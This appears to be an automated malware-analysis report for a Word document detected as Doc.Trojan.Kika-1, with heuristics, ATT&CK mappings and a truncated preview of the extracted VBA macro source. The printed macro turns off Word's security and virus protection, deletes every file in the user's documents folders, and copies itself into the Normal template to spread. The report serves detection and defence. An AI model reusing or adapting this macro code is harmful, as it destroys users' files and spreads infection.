MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros. The Document_Open macro is configured to execute automatically, and it attempts to disable security features and delete files. The ClamAV detection 'Doc.Trojan.Kika-1' further supports the malicious nature of the file. The macro also attempts to clear existing code and rename components, suggesting a self-propagation or obfuscation mechanism.
Heuristics 5
-
ClamAV: Doc.Trojan.Kika-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Kika-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6023 bytes |
SHA-256: 2490837dfbf29698cfd9dd2cc45b3e1dff58984a9b7b5ae6cc326329c48abf0d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KIKA"
Attribute VB_Base = "1Normal.KIKA"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.ShowVisualBasicEditor = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Visible = False
Options.VirusProtection = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") <> "by BAMBAM" Then
Kill ("c:\Mis documentos\*.*")
Kill ("C:\My documents\*.*")
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") = "by BAMBAM"
Set FRED = ActiveDocument.VBProject.VBComponents.Item(1)
Set PETER = NormalTemplate.VBProject.VBComponents.Item(1)
Shell ("LABEL C: KIKA"), vbMinimizedNoFocus
BETY = PETER.Codemodule.CountOFlines
BILMA = FRED.Codemodule.CountOFlines
bambam = 2
If FRED.Name <> "KIKA" Then
If BILMA > 0 Then FRED.Codemodule.Deletelines 1, BILMA
Set Ainfectar = FRED
FRED.Name = "KIKA"
hacerAD = True
PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 26)))
End If
If PETER.Name <> "KIKA" Then
If BETY > 0 Then PETER.Codemodule.Deletelines 1, BETY
Set Ainfectar = PETER
PETER.Name = "KIKA"
hacerNT = True
PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
End If
If hacerNT <> True And hacerAD <> True Then GoTo byebye
If hacerNT = True Then
Do While FRED.Codemodule.Lines(1, 1) = ""
FRED.Codemodule.Deletelines 1
PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
Loop
Ainfectar.Codemodule.AddFromstring ("Private Sub Document_Close()")
Do While FRED.Codemodule.Lines(bambam, 1) <> ""
Ainfectar.Codemodule.insertlines bambam, FRED.Codemodule.Lines(bambam, 1)
bambam = bambam + 1
Loop
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub ViewVbCode()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + (Chr(34) + "Its KIKA VIRUZ Ja,ja,ja... : )" + Chr(34)) + "," + "vbokoNLY," + Chr(34) + "Alt-F11 hmmm..." + Chr(34)
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End Sub")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub HelpAbout()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + ((Chr(34) + "Sorry " + (Chr(34)) + "+" + "Application.UserName" + "+" + (Chr(34)) + ", but... you have KIKA VIRUZ by BAMBAM. (c)copywrong. " + Chr(34)))
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End sub")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub ToolsMacro()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("MsgBox") + (Chr(34)) + "I know you " + (Chr(34) + "+" + "application.username" + "+" + Chr(34) + " and i'm observing you " + Chr(34))
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End Sub")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub FileTemplates()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End Sub ")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub help()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On error resume next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Assistant.Visible = True")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, (" With Assistant.NewBalloon")
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.